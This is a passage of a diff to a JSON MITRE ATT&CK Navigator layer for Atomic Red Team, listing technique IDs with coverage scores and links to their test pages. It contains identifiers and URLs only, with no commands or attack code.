ueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T113